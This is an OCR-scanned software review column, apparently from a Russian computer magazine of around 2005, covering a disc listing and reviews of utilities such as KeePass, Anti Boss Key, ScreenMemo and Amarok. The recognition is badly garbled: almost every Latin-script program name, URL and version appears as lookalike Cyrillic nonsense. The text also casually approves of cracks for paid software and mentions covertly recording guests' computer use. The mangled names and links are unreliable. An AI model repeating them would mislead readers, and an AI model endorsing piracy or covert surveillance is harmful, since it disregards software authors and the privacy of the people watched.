никнуть не должно. А после установки тебя ждет: 
Ядро 2.6.11.6 

КОЕ 3.3.2 с частичной поддержкой функций 

КОЕ 3.4 

ОЫОМЕ 2.8.3 

Рігеіох 1.0.2 

ОрепОІІісе.огд 1.1.4 

Ссігіооіз 2.01 с поддержкой двухслойных ОѴО+П с- 
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АСОЗее 8.0.39 
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Соіог ЗсИетег Зіисііо 1 .5 
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Ропі Сгеаіог V 5.0 
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Репѵѵег 2005-07-19 
ОоѵѵпІоасІ Мазіег 4.3.6.927 
еМиІе 0.46с 
РТРІІрсІаІеЗеагсІіег 1.0 
бепеб РТР Зегѵег 3 
КІірРоІіо 3.0 Веіа В 
МахІМоп 1.2.4 
тІВС 6.16 
Мтар 3.93 
Опііпе Т V РІауег 2.8 
Орега 8.50 
Оиірозі РігеѵѵаІІ 3.0 
Ргоху Зѵѵіісбег 3.3.0 
РгохубгаЬ ѵ0.5 
дір 2005 ЬиіЮ 7520 
Васітіп 2.2, Вабтіп ѵіеѵѵег 
ЗІіагеаіа 2.2.0.0 
ЗтаПРТР 1.5.990.11 
ЗратРаІ ѵі.591 

здиМ-З.О-РВЕЗ 
Тідтѵыс 1.2.9 
ѴѴеЬНТТгаск 3.33 

ѴѴЦ-РТРР 2.6.2 

уарб 0.91 



ОЕѴЕЮРМЕЫТ 

сззесі 0.3.0 



ТІіеВаІ! ѵЗ.60 
ѵЗкуре 1.0.0.33 
Ѵургезз СІіаІ 2.1 
ѴѴШ Рііе ЗІіаге Рго 3.20 

ОЕѴЕЮРМЕМТ 

.І\ІЕТ ВеЛесТог 4.1.84.0 
АсІіѵеРегІ 5.8.7.813 
ети8086 4.0057 
МА5М32 8.2 
РЕЮ 0.93 
РегІЕХ 2.3.1. 2 
РМр 5.0.5 
ВедехВисІ сіу 2.06 
5тЬ4к 0.6.3 
ЗоШіпк ОНТМІМепи 6.1 
5ѴѴР Оесотрііег МХ 20056 
ЗіеаШі РЕ 2.1 
ѴѴіпНех 12.55 



ЗУЗТЕМ 

АРВаскир 2.7 
ВезІСгурІ 7.20 
Огіѵег Оепіиз 2005 
ЕхрІоге2Із 1.07 

6ТК+2.8 

ріір 4.4.0 

ѵѵхВазіс Іог Ипих 



ЗУЗТЕМ 

ВезІСгур1 1.6.2 
КегпеІ 
тс 4.6.1 



Ех12 ІпзІаІІаЬІе Рііе 
Зузіет 1.10а 
НР Типе 2.50 
НѴѴІЫР032 1.55 
ппСгоп 1.89 
ВАМРізк ХР 1.9.100 
Весоѵег Му Рііез 3.76 
Тгие І_аипсІі Ваг 3.2 
ѴМѵѵаге ѴѴогкзІаІіоп 5.0 

МІЗС 

АсІ-Ашге ЗЕ 1.06 
АсІоЬе ВеасІег ЗреесІ-ІІр 1 .32 
СеІІ РІіопе Мападег Ѵ5.3.1 
Р]ѴиВеас1ег 2.0.0.26 
РіпеРгіпІ 5.44 
МакеЫоТез 0.3.1 .1 В 
Місгозоіі АсІіѵеЗупс 4.0 
МоЬіІе РаІаВазе 1.25 
N515 2.09 
РаззѴіеѵѵ 1.5 
рсІІРасІогу Рго 2.44 
рзегѵ.срі 2.6 
Зирегіог Зеагсб 2005 
ѴѴіпВАВ 3.5 

ѴѴіпе 20050830 

МІЗС 

АІРЕ0.10 
Віиеіізіі 1.0.4 
РІѴиНЬге 3.5.14 
ІоІіп-1.6 
Іодсііеск 1.2.41 
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ѴоісеЗесигеИ: 2003 

УУІПСІ0ѴѴ5 9х/Ме/ІМТ/2к/ХР 

Зіге: 9466 КЬ 

ЗИагѳѵѵагѳ 

ѵѵѵѵѵѵ.ѵоісеіМесІі.сот 



Когда на один компьютер приходится несколько пользователей, процеду- 
ра входа в систему неизбежно усложняется. Неправильно набранное имя 
вызывает раздражение, забытый пароль оборачивается серьезной голов- 
ной болью... Зная об этой проблеме, один мой знакомый нашел элегант- 
ный способ упростить себе жизнь: на своей домашней машине он снача- 
ла создал специальные учетные записи для жены и ребенка, а затем ус- 
тановил и настроил систему голосовой аутентификации ѴоісеЗесигеИ. Те- 
перь любому из его домашних достаточно просто сказать в микрофон ко- 
довую фразу, чтобы компьютер опознал говорившего и впустил его в сис- 
тему с соответствующими правами доступа. При этом знаешь, что самое 
забавное? Что кодовая фраза — «мой пароль — мой голос!» — у папы, 
мамы и дочери одна на всех, хотя программу ѴоісеЗесигеИ это, похоже, 
нисколько не смущает. По крайней мере, она требует лишь одно: чтобы 
кодовая фраза была не слишком короткой, то есть чтобы ее нельзя было 
произнести менее чем за две секунды. 

В состав программы входит отдельный менеджер пользователей и пара 




дополнительных модулей для настройки микрофона и системных пара- 
метров («придирчивость» голосового анализатора, количество попыток 
входа в систему, дизайн окна). Все очень логично и понятно. В неприят- 
ную ситуацию с ѴоісеЗесигеИ я попал лишь однажды: при настройке я неп- 
равильно указал пароль к учетной записи и после перезагрузки, не смот- 
ря на то, что мой голос был опознан, винды отказались меня пустить. 

Іпяиігу ѵ 1.2 

ѴѴіпсІоѵѵз 9х/Ме/І\П72к/ХР 

Зіге: 3322 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.теіаргобисіз.сот 



Информационная «ко- 
пилка» для веб-стра- 
ниц и их фрагментов. 
Чрезвычайно удобная 
вещь, серьезно об- 
легчающая работу с 
сетевыми информа- 
ционными ресурсами. 
Очень качественно ин- 
тегрирована в ослик 
ІЕ: мне особенно пон- 
равилась возможность 
добавления выделен- 
ного участка веб-стра- 
ницы в базу данных программы простым сігад-апсі-сігор'ом. Разумеется, 
Іпциігу может работать и как самостоятельное приложение, доступное из 
контекстного меню Орег'ы или Рігеіох. Правда, в этом случае можно сра- 
зу забыть о сігад-апсі-сігор'е и функции сохранения выделенных фраг- 
ментов. Впрочем, один из разработчиков программы (явно наш чело- 
век:)) обещал обратить серьезное внимание на улучшение совмести- 
мости Іпциігу с альтернативными браузерами. 

База данных программы имеет древовидную структуру. Все записи 
можно редактировать, и снабжать комментариями. Есть встроенный по- 
исковый механизм. Поддерживается запись накопленной информации в 
виде файла формата СНМ, МНТ, ЕХЕ или коллекции НТМІ_-страниц. 
При этом, что немаловажно, у Іпциігу нет никаких проблем с русским 
языком. Даже хелп у проги написан на «великом и могучем», что, кста- 
ти, позволяет рекомендовать Іпциігу не только опытным веб-серферам, 
но и начинающим «интернет-пользователям». 
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30 ѴѴопсІег ѵ 1.1 

УУІПСІ0ѴѴ5 ХР 

Зіге: 5221 КЬ 

ЗІіагеѵѵаге 

ѵѵѵѵѵѵ.ЗбѵѵопсІег.сот 



Разработки ведутся уже очень давно, но о конк- 
ретных сроках долгожданной трехмеризации 
интерфейса ѴѴіпсІоѵѵз по-прежнему ничего не 
слышно. Однако спрос рождает предложение. 

Пока Місгозоіі тормозит, независимые програм- 
мисты стараются заработать себе на хлеб с мас- 
лом. К примеру, в этом месяце порадовали ре- 
бята из компании Оатегз Тоѵѵег, выпустившие в 
Сеть новую версию программы 30 ѴѴопсІег. Их 
разработка, правда, не претендует на звание серьезного «трехмериза- 
тора», но ее работа смотрится весьма эффектно. После запуска 30 
ѴѴопсІег неподвижная фонововая картинка на Рабочем столе сменяется 
видом чрезвычайно оживленного участка космического пространства. 
Впрочем, пролетающие мимо астероиды и космические корабли в дан- 
ном случае выполняют чисто декоративные функции, поскольку боль- 
шую часть экрана занимает огромный «гипер-куб». И этот куб довольно 
интерактивен. Его можно вращать, каждая его плоскость может исполь- 
зоваться для размещения иконок, а если ты считаешь, что картинке не 
достает оригинальности, то нажатие СТВІ_+І мигом переносит тебя во 
внутреннее пространства куба, усиливая ощущение подлинной вирту- 
альности и вызывая легкий приступ клаустрофобии. 

Сапіог ѵ 1 .6 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 4315 КЬ 

ЗІпагеѵѵаге 

ѵѵѵѵѵѵ.ѵігзуп.сіе/еп 



В этой рубрике мы уже 
неоднократно расска- 
зывали о программах, 
заставляющих компь- 
ютер разговаривать. 
Думаю, пришла пора 
двинуться дальше и 
обратить свое внима- 
ние на софт, заставля- 
ющий твою машину 
петь. Для первых экс- 
периментов в этой об- 
ласти рекомендую ис- 
пользовать программу Сапіог. Во-первых, ее может освоить даже тот, 
кто никогда не занимался созданием музыки на компе, а во-вторых, 
Сапіог весит относительно немного, так как действительно синтезирует 
вокал, а не юзает библиотеку готовых семплов. 

Программа умеет петь на английском и немецком языках. Но поскольку 
любое слово в Сапіог'е собирается из отдельных фонем, ничто не меша- 
ет тебе употребить имеющиеся фонемы для формирования русских 
слов. А то, что компьютер будет петь наши песни с иностранным акцен- 
том, так это, на мой взгляд, даже веселее. Кстати, Сапіог умеет синте- 
зировать до восьми партий одновременно — это я специально говорю 
тебе на тот случай, если ты страстный поклонник хорового пения. Кро- 
ме того, пользователь программы может управлять всеми параметрами 
исполнения, накладывать эффекты и даже редактировать не только 
партии, но и голоса/фонемы. Хотя, нужно заметить, что демо-версия 
Сапіог урезана функционально и не позволяет задействовать возмож- 
ности программы в полном объеме. А жаль! 

Апіі Возз Кеу ^ шш 
ѵ 3.91 

ѴѴіпсІоѵѵз 9х/Ме/ІЧТ/2к/ХР 

ЗІ2Ѳ: 713 КЬ 

ЗІпагеѵѵаге 

ѵѵѵѵѵѵ.тіпсідетз.сот 



Удобная утилита, по первому твоему сигналу скрывающая следы неце- 
левого использования рабочего компьютера от бдительного ока началь- 
ства и чрезмерно любопытных коллег. На мой взгляд, достойных сопер- 
ников у этой проги практически нет. 

Профессиональный статус Апіі Возз Кеу чувствуется буквально с первых 



шагов. Например, в 
твою систему утилита 
внедряется незамет- 
но, не предлагая по- 
ламерски украсить 
своей иконкой Рабо- 
чий стол или добавить 
свой пунктик в меню 
«Пуск», а настройка 
программы произво- 
дится из окна, выле- 
зающего на экран 
лишь при нажатии за- 
данной комбинации 
клавиш (по умолчанию: "СігІ" + Т). Процесс настройки в простейшем слу- 
чае сводится к перетаскиванию названий приложений из одного списка 
в другой. После этого одобренные начальством проги начнут по горячей 
клавише ("СігІ" + вылетать на передний план, а «запрещенные» — ли- 
нять с экрана (не забывая при этом убирать свою кнопку с Панели за- 
дач!). И это только базовые функции! А ведь имеются еще и дополни- 
тельные, среди которых самыми, пожалуй, интересными являются воз- 
можность оперативного запуска «обязательной» проги с автоматичес- 
ким размещением ее окна на переднем плане и умение Апіі Возз Кеу вы- 
рубать/приглушать звук, подавлять дочерние окна уже "спрятанных" при- 
ложений, блокировать доступ к машине и запускать скинсейвер. 

АиІоЗаѵе ѵ 2.0 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Зіге: 6694 КЬ 

ЗІпагеѵѵаге 

ѵѵѵѵѵѵ.ѵ-сот.сот 



Серьезный бэкап-менеджер. Встра- 
ивается в систему, отслеживает 
операции создания/сохранения 
файлов, и в фоновом режиме копи- 
рует в надежное место все докумен- 
ты, с которыми работает пользова- 
тель. Это идеальный помощник для 
нетерпеливых и забывчивых людей, 
поскольку резервная копия любого 
документа создается автоматичес- 
ки, а процесс резервирования информации протекает незаметно, не вы- 
нуждая человека делать перерыв в работе. Нетрудно догадаться, что 
программа АиІоЗаѵе относится к разряду «настроил и забыл». Хотя на- 
чинающего пользователя, пожалуй, может испугать отсутствие русского 
интерфейса и обилие всевозможных опций. К счастью, ковыряться во 
всех этих опциях тебе совершенно не обязательно — для начала ты мо- 
жешь воспользоваться помощью мастера и типовыми настройками. 
Кстати, в мастере рекомендую обратить особое внимание на пункт 
Васкир Іііез изесі ог сгеаіесі Ьу арріісаііопз уои Наѵе іпзіаііесі, и ты можешь 
сохранять свои ЭОСи куда попало — программа АиІоЗаѵе все равно по- 
ложит копию любого такого документа в свое хранилище. 

Впрочем, рано или поздно тебе самому захочется разобраться в наст- 
ройках программы, поскольку, как я уже сказал, АиІоЗаѵе — софт 
серьезный, предлагающий опытному пользователю массу интересных 
возможностей типа системы автоматической передачи данных или про- 
жига информации на СОЮѴО (с автоматическим разбиением данных на 
блоки требуемого объема). 

КееРазз 1.03 

ѴѴіпсІоѵѵз 9х/Ме/ІМТУ2к/ХР 

Зіге: 550 КЬ 

Вгееѵѵаге 

МИр://кееразз.зоигсеІогде.пеІ 



Новый хранитель паролей, который я поставил на свой походный 256-ме- 
габайтный ІІЗВ-брелок. Старенький СКАРАБЕЙ (ѵѵѵѵѵѵ.аІпісЬаз.іпІо), кото- 
рым я пользовался до этого, увы, пришлось отправить на пенсию, пос- 
кольку эффективно работать с моей чрезвычайно разросшейся коллек- 
цией логинов и паролей он, к сожалению, уже не мог. Но, честно говоря, 
это меня не особо расстроило, так как быстро выяснилось, что утилита 
КееРазз обладает всеми достоинствами СКАРАБЕЯ, но при этом абсо- 
лютно лишена его недостатков. 

КееРазз — это маленькая бесплатная утилита с открытыми исходника- 
ми. Работает без установки, хранит данные в зашифрованном виде, 
позволяет эффективно группировать и сортировать отдельные записи 









(то, чего мне так не хватало в СКА- 
РАБЕЕ), поддерживает автозапол- 
нение веб-форм и допускает ввод 
логина/пароля простым перетаски- 
ванием из окна программ в нужное 
поле ввода. В КееРазз также 
встроен продвинутый генератор 
паролей и модуль экспорта/импор- 
та информации. Доступ к базе 
программы может открывать как 
обычный «мастер-пароль», так и 
вставленный в дисковод ключевой 
диск. С домашней страницы КееРазз можно скачать парочку полезных 
плагинов и файл для русификации интерфейса. Да, забыл упомянуть 
еще одну интересную фишечку этой замечательной проги — к любой 
записи в базе можно прикреплять файлы. Другими словами, КееРазз 
позволяет хранить не только пароли, но и криптографические ключи, 
что, надо отметить, довольно удобно. 

ЗесигіІуЗирегѵізог ѵ 1.2 

ѴѴіпсІоѵѵз 2к/ХР 

Зіге: 269 КЬ 

ЗНагеѵѵаге 

ѵѵѵѵѵѵ.зесигііузирегѵізог.сот 




Любопытный наборчик «4 в 1», ко- 
торый рекомендуется использовать 
совместно с антивирусом/брандма- 
уэром, чтобы более качественно 
прикрыть «дырки», с которыми 
указанные программы не всегда 
справляются достаточно хорошо. 

В состав этого набора входит соф- 
тина для блокирования баннеров, 
монитор НТТР-трафика и утилита, 
сообщающая обо всех попытках 
твоего браузера, мейлера или ась- 
ки выполнить запуск стороннего 
приложения. Четвертая програм- 
ма, входящая в этот набор, назы- 
вается ЕтаіІЗирегѵізог. На мой взгляд, она самая интересная из всех, 
поскольку с ее помощью ты можешь контролировать несанкциониро- 
ванную отправку писем с твоей машины. Причем ЕтаіІЗирегѵізог не 
пытается тупо блокировать все попытки соединения, а поступает хит- 
рее: прежде чем оборвать связь, утилита старается выяснить, кому, 
от кого «уходит» письмо, что в нем написано, и какой файл к этому 
письму прикреплен. Согласись, важность таких подробностей перео- 
ценить трудно — слишком много нынче развелось программ-шпио- 
нов, умеющих отправлять свои отчеты на мыло Хозяину. Также 
ЕтаіІЗирегѵізог может применяться и для предотвращения утечки сек- 
ретных сведений по легальным каналам. К примеру, во время тести- 
рования я создал правило, которое запрещало любому приложению 
отправлять сообщение с паролем от моего ІІІЫ'а. Когда же я попытал- 
ся из Ваі'а отправить письмо с соответствующими сведениями, 
ЕтаіІЗирегѵізог тут же заблокировал передачу данных и выплюнул на 
экран соответствующее предупреждение. 

ЬЫ.еап 1.16 

ѴѴіпсІоѵѵз 9х/Ме/ІМТ/2к/ХР 

Ргееѵѵаге 

Зіге: 139 КЬ 

Ііир://ЬЬ4ѵѵіп.зоигсеІогде.пеѴЬЫеап 





ВВІ_еап — это отдельная ветка проекта 
ВІаскЬох Іог ѴѴіпсІоѵѵз. Если тебе это ни о чем не 
говорит, скажу проще: ВВІ_еап — это альтерна- 
тивная графическая оболочка для ѴѴіпсІоѵѵз. 
Очень удобная, очень стабильная. Ее дистрибу- 
тив полностью настроен, и в его состав входит 
минимально необходимый комплект плагинов. 

Сразу после запуска этой оболочки пользова- 
тель найдет на экране и панель задач, и системный трей, и менеджер ра- 
бочих столов. Иконок на экране не будет, но до своих любимых программ 
юзер легко доберется из контекстного меню, появляющегося по правому 
клику мыши. Создатели ВВІ_еап придерживаются принципов минимализ- 
ма, что, впрочем, не мешает этой оболочке поддерживать сменные темы 
и стильно выглядеть. Но в первую очередь ВВІ_еап привлекает продвину- 



тых товарищей низкими системными требованиями, хорошей скоростью 
работы и наличием большого количества плагинов, расширяющих ее 
функциональность. Подробная документация идет в комплекте с прог- 
раммой. Установки ВВІ_еап не требует, просто распакуй куда-нибудь ее 
файлы и запусти ЫаскЬох.ехе. А дальше — кто знает?!! Может быть, на 
стандартный виндозный зііеіі тебе больше и смотреть-то не захочется. 

рзегѵ ѵ 2.6 ^ 

ѴѴіпсІоѵѵз ІЧТ/2к/ХР 2 ^ 1МЁМ ЙЕІіЙЯав: 

Ргееѵѵаге 

Зіге: 230 КЬ 

Иир://р-папсІ-д.сот/е/рзегѵ.ІіітІ 



Любой продвинутый юзер, устано- 
вив себе ІМТ-ЬазесІ операционную 
систему, рано или поздно решит 
навести порядок в работающих на 
его машине системных службах. 
Оно и понятно! Отключив службы, 
которые тебе не нужны, можно 
сразу убить трех зайцев: повысить 
безопасность, ускорить работу 
системы и освободить немного па- 
мяти (кстати, хороший русскоязыч- 
ный хелп по службам ѴѴіпсІоѵѵз ХР 
находится на сайте ѵѵт /ѵ.озгопе.пеі). 
Одна беда — стандартная оснаст- 
ка Службы (Зегѵісез) довольно да- 
лека от совершенства. Поэтому 
вся продвинутая молодежь пред- 
почитает использовать вместо нее апплет рзегѵ.срі. Дело в том, что пос- 
ледний имеет целый ряд важных преимуществ. Во-первых, основная 
информация выводится в одном окне и тебе не надо, к примеру, дол- 
го кликать по названиям служб, чтобы посмотреть, какая из них свя- 
зана, скажем, с файлом Ізазз.ехе. Во-вторых, для выделения рабо- 
тающих служб софтина пользуется шрифтом синего цвета, отклю- 
ченные показывает серым, а остальные выводит черным. Ну и, в- 
третьих, кроме служб, данный апплет умеет аналогичным образом 
отображать еще и списки драйверов, процессов и установленных 
прог! Это мегаудобно. Особенно если учесть, что включить/отклю- 
чить/удалить любой драйвер или службу с помощью рзегѵ.срі можно 
буквально за пару кликов. 

ОѴРІсІІе Рго 5.9.3.3 

ѴѴіпсІоѵѵз 95/98/2 К/ХР 

ЗНагеѵѵаге 

Зіге: 1153 Кб 

ѵѵѵѵѵѵ.бѵсіісііе.сот 




У одной вдовы муж курил и скурился. У другой — 
пил и спился. А у третьей просто скончался :). 
Чтобы твой БУБ-привод не постигла печаль- 
ная участь, следует его беречь не менее, чем 
предстательную железу. Как у всякого настоя- 
щего хакерюги, твой комп работает 24/7. Тог- 
да получается, что пока ты отдыхаешь и наби- 
раешься сил, твоя крутилка все равно продолжает работать, истощая 
свой ресурс. Тебе не хочется спасти ее? ЗтагІ-ВеасІ-АІіеасІ технология 
помогает отрубать твой ЭѴЭ, когда в его работе нет потребности. Вся 
промежуточная инфа (титры, нахождение определенной главы на дис- 
ке) будет сохранена на жестком диске, чтобы выцепить ее оттуда при 
возврате к просмотру твоего ЭѴЭ. Утилита оптимально состыковывает- 
ся с другим полезным продуктом, который был подготовлен теми же ко- 
дерами — ЭѴЭ Ведіоп+СЗЗ Ргее. Приятно, что тулза своевременно об- 
новляется. Неприятно, что за столь простое творение программерской 
мысли требуют аж 50 у.е. Снова приятно, что господа крэкеры не забы- 
ли о бедствующих россиянах, подготовили лекарства. 

Сгесііі СагсІ апсі Ю Сиагсіег 2.03 

ѴѴіпсІоѵѵз 95/98/Ме/2К/ХР/2003 

ЗНагеѵѵаге 

Зіге: 3747 Кб 

ѵѵѵѵѵѵ.дгеаіѵѵаІІзоК.сот 




Одна из причин, почему интернет-банкинг остается диковинкой — сете- 
вое мошенничество. Многие юзвери боятся, что злодеи сольют денежку 
со счетов, оставят их с носом. Теперь же предлагается очередное обез- 
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боливающѳе для переживающих за свою 
зесиге'ность. Тема пресекает появление кеу- и 
зсгееп-логгеров, которыми обычно тырятся 
электронные счета. Встроен довольно грамот- 
ный механизм по борьбе с рНізНег'ами, кото- 
рый отслеживает твое точное местонахожде- 
ние, предотвращает перебросы на сайты-двой- 
ники, которые выбивают твои креды и палки. Теперь ты всегда будешь 
уверен, что находишься на верном сайте. Производится капитальное 
тестирование системы, проверяются все автозапускные проги, чекают- 
ся виндовые сокеты и подавляются провокации и Иуаск'и ВНО (Ьгоѵѵзег 
Пеір оЬіесІ). 



$ѴС2кХР 2.2 

ѴѴіпсІоѵѵз 2К/ХР 

Вгееѵѵаге 

Зіге: 49 Кб 

ѵѵѵѵѵѵ.пізѵсТд.сІе 



Вот поставил еще 
один ХР Іѵѵеакег для 
винды. А пользы? Ее, 
оказывается, самый 
минимум, когда зна- 
ешь, что 2001-я приб- 
луда сможет лишь по- 
менять пару заставок 
да выбросить с деся- 
ток ненужных файлов. Здесь же предлагается более продуманное ре- 
шение. Не секрет, что 90% и более юзеров не используют свой комп как 
сервер. Сервисы оказываются ненужными вовсе и, более того, неоправ- 
данно пожирающими твои ресурсы. Предлагаем твоему вниманию уни- 
версальный ЗѴС2кХР — кастратор всей этой сервисной сволочи. Отны- 
не твой комп будет только твоим компом, не станет высокомерно счи- 
тать себя сервером. Если же какой из сервисов останется нужным, бу- 
дет оперативно проведена безопасная настройка. 

РНоІоТоГіІт 2.0 ВиіІсІ 30 Веіа 

ѴѴіпсІоѵѵз 95/98/Ме/2К/ХР/2003 

ЗНагеѵѵаге 

Зіге: 554 Кб 

ѵѵѵѵѵѵ.рНоІоІіІт.сот 




Есть лишь одно изобре- 
тение, которое может 
побить своей абсурд- 
ностью низкокачест- 
венные ММЗ-фотки — 
видео, снятое мобиль- 
ником. Делайте краси- 
вее, снимайте серии 
фоток качественным 
аппаратом, а потом со- 
единяйте их в корот- 
кий, но полноценный 
фильм. Тут поможет простая софтинка — РІюІоТоРіІт. Ты просто 
скармливаешь ей груду фоток, а на выходе получаешь забавный мувик. 
Здесь же можно перегнать его в любой формат, на какой способны ко- 
деки твоего компа. Работая с тучей видеоформатов, прога не чурается 
и бесконечного ряда графических форматов — скушает все от ^(3 до 
ТІРР. Софт напомнил мне о детских годах, когда я сам рисовал мульти- 
ки на бумажном блокноте (мульт оживал при быстром перелистывании 
десятков страничек блокнота). 

ЗсгеепЫето РІауег 1.0 

ѴѴіпсІоѵѵз 2К/ХР 

Ргееѵѵаге 

Зіге: 2825 Кб 

ѵѵѵѵѵѵ.хсізпеі.сіе 




Какая может быть польза от запуска постороннего на твой компьютер? 
Социально опасный индивид будет иметь один ответ — следить за гос- 
тем. ЗсгеепІМето будет записывать на видео абсолютно все, что проис- 
ходило за время твоего отсутствия. Прога умеет записывать происходя- 
щее как в целом на экране, так и в отдельно взятых окнах. Кроме жиганс- 
кого применения, есть и более мирные — записывать на видео свои 



проблемы в настрой- 
ке, чтобы потом пока- 
зать «старшим това- 
рищам». Поможет и 
самим отцам записать 
решение проблемы 
для дальнейшей пере- 
дачи ламерам. Прога 
дает ту наглядность, 
что не способен вы- 
дать ни один клавиа- 
турный шпион. Замет- 
но опережает в удоб- 
стве и зсгеепзПоТмо- 
ниторы. Единственная проблема — размер видеофайла — при слежке 
за удаленной системой могут возникнуть траблы при скачке материала. 

СоосІЗІіоІ 1.06 

ѴѴіпсІоѵѵз 95/98/2 К/ХР 

ЗІпагеѵѵаге 

Зіге: 403 Кб 

ѵѵѵѵѵѵ.кутиз.сот/ОообЗНокНІтІ 




Заниматься сексом по 
веб-камере — вче- 
рашний век. Сегодня 
умами правит лишь 
спорт. «Секса у нас 
нет!». Если уж покупать 
этот самый видеогла- 
зок, так только ради 
игры в баскетбол. Про- 
га анализирует видео- 
поток и понимает, нас- 
колько силен ты в бас- 
кете, сколько очков те- 
бе полагается зачис- 
лить. Несмотря на всю 
бредовость идеи, прога 
даже умеет учитывать 
размер мяча, который будет соотноситься с регулируемым диаметром и 
высотой кольца. Можно играть как одному, так и вдвоем: если раньше 
мы приглашали девушек глянуть, как выглядит линукс, то теперь всех 
девах будем таскать только на домашние матчи по баскету! В послед- 
ней версии появилась совсем чумовая настройка — регуляция уровня 
гравитации. Привыкшие к игре в космосе не обломаются, но получат 
ощутимую фору. 

ВІиеІооІН Ветоіе Сопігоі 1.0 

ѴѴіпсІоѵѵз 95/98/2 К/ХР 

ЗНагеѵѵаге 

Зіге: 403 Кб 

ѵѵѵѵѵѵ.ЫиеІооІИзИагеѵѵаге.сот 




Для проведения презентации я 
пригласил одну длинноногую под- 
ругу нажимать кнопку «пробел», 
чтобы перелистывать слайды в 
Роѵѵег Роіпі. Это удовольствие сто- 
ило мне недешевого обеда и двух 
часов пустых разговоров с ВагЬіе 
дігі. Чтобы не стать пластиковым, 
перелистывай сам слайды, нажи- 
мая кнопу в своем ВІиеІооІП-мо- 
бильнике. Так ты сэкономишь 
деньги, силы и будешь выглядеть 
непростительно модно. Прога пред- 
лагает кучу направлений управле- 
ния твоим компом через ВТ: ста- 
вить музыку и фильмы, управлять 
мышкой и клавой компа. Каждый найдет себе свое после установки 
плугина в мобилу и на ноут: в первый пойдет простой апплет ^аѵа МЮР 
2.0 нужна), на комп — небольшая шаровара. Разве ты еще не стал су- 
перпрезентатором? Теперь ты можешь использовать длинные ноги под- 
руги по их прямому назначению... Для прогулок за сушеными кальмара- 
ми к пивку :). 
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ССРіІтз 5.3 

Р05ІХ (*В5Р, Ыпих, Зоіагіз...) 

Размер (в .д т.): 517 КБ 

ИНр://Ііоте.дпа.огд/дсІіІт5/ 
Лицензия: ОШ 0Р1_ 



Многим людям нравит- 
ся составлять список с 
коллекцией своих филь- 
мов. Обычно для этого 
идет в ход некий таб- 
личный процессор и 
руки, усердно набира- 
ющие, либо копирую- 
щие всякую информа- 
цию о фильме — кто 
режиссер, какие акте- 
ры и так далее. Но все 
это можно автоматизи- 
ровать с помощью ути- 
литы ОСРіІтз. Она написана РегІ с использованием дІк2-регІ, что, в принци- 
пе, уже стандартно для современных дистрибутивов *піх. Программа даже 
оснащена графическим инсталлятором, который проверяет, установлены 
ли в системе нужные компоненты, и в случае положительного результата 
проверки устанавливает ОСРіІтз, а если нет — говорит, чего не хватает. 
Чтобы добавить фильм в виртуальную коллекцию, можно заполнять его 
поля вручную, а можно ввести приблизительное название фильма и на- 
жать кнопку Реісіі Іпіогтаііоп — тогда нужные данные будут взяты из Сети — 
правда, в большинстве случаев на английском языке. Еще бывает на 
французском, немецком и так далее. О русских базах данных по фильмам 
(и совместимых с ОСРіІтз) я не осведомлен. А вот о заграничных ОСРіІтз 
знаю многое. Советую из него выбирать ІІѴГОЬ — там больше всего филь- 
мов. ОСРіІтз скачивает обложку, краткое описание, информацию о режис- 
сере, актерах и так далее. Таким образом автоматически заполняются со- 
ответствующие поля. Среди полей «карточки» для фильма есть также по- 
ле о том, кто одолжил у тебя этот фильм, на каком носителе фильм запи- 
сан, какие там есть субтитры и многое другое. А вот поля, куда можно впи- 
сать битрейт и формат — этого, увы, нет. Но в целом впечатление от 
ОСРіІтз очень положительное. Кстати, ее интерфейс поддерживает скины. 

Атагок 1.3 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 

Размер (в .Ьг2): 560 КБ 

Іпир://ѵѵѵѵѵѵ.ЬоотегапдзѵѵогІсІ.сІе/ѵѵогкег/ 

Лицензия: ОШ ОРІ_ 



I, 



и 



А 



Один из лучших аудиоплееров для среды КОЕ. Собственного движка воспро- 
изведения не имеет, поэтому использует установленные в системе внешние 
— Хіпе, ОЗігеатег. Идея, лежащая в основе Атагок, — заведование базой 
данных на музыку, которая лежит у тебя на винте. Атагок ее сканирует и сос- 
тавляет на основе этого коллекцию. В отличие от других плееров, в Атагок 
главное — окно плей-листа, а обычное «плеерное» окно вообще скрыто по 
умолчанию. Оно и не нужно. Потому что кнопки управления и графический 
анализатор можно вынести на панель инструментов окна списка песен. 



Атагок умеет скачивать обложки к 
альбомам (но можно использовать 
для этого и локальные файлы), брать 
информацию об исполнителе/группе 
из сетевой энциклопедии ѴѴікіребіа и 
получать текст текущей песни с 
I угс.сот.аг (пока что не самый бога- 
тый на тексты сайт, но все же...). 

В Атагок есть средство заливки 
файлов на устройство іРоб — доста- 
точно перетащить файлы на панель 
Устройства и нажать кнопку «Передача». Поддерживается выполнение 
скриптов — например, экспорт списка песен в НТМЬфайл (с красивым фор- 
матированием), будильник (играет заданную песню в такое-то время) и другие. 

СІкСиіІипе 0.7 

Иир://ѵѵѵѵѵѵ.деосі^іез.сот/Ііагріп_ЛоІі/кдиіЩпе_раде.Іі!тІ 

Размер (в .д т)\ 54 кб. 

Лицензия: ОШ ОРІ_ 




Чтобы точно, правильно настроить гитару вовсе не обязательно покупать 
камертон, «железный» тюнер или снимать телефонную трубку, чтобы 
послушать, как звучат искомые 440 герц, или «ля» первой октавы. Надо 
просто установить ОікОиіІипе. 

СКкОіШипе анализирует поступающий на вход звуковой карты сигнал и 
преобразует его в форму нот и частот. Звуковой порт можно (и нужно, 
потому что по умолчанию выставлен порт управления громкостью) выб- 
рать в настройках (Орііопз > Весогсііпдз Іприі) — например, Міс или І_іпе. 
Подключаешь микрофон, играешь в него на гитаре. Смотришь на встро- 
енный (ЗікОіШипе в дисплей, соотносишь настраиваемые струны с пока- 
заниями дисплея. А всего-то нужно добиться, чтобы 1-ая струна звучала 
нотой Е (ми), 2-ая — В (си), 3-я — О, 4-ая — О, 5-ая — А и 6-ая — Е. 
Кроме СИкОіШипе, со страницы проекта доступны версии программы, 
заточенные под библиотеки КОЕ и 01 — КОіШипе и ОЮиіІипе. Поэтому 
даже если какой-либо вариант Оиііипе у тебя не будет компилироваться 
или работать, то найдется, чем его заменить. 
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І-од^т 4.5.1 

Р05ІХ (*ВЗР, Ыпих, Зоіагіз...) 
Нир://пеидіегід.огд/зоКѵѵаге/Іодіат 

размер (в .Ьг2): 749 кб. 

Лицензия: ѲІЧІ) ОРІ_ 



Основанный на библио- 
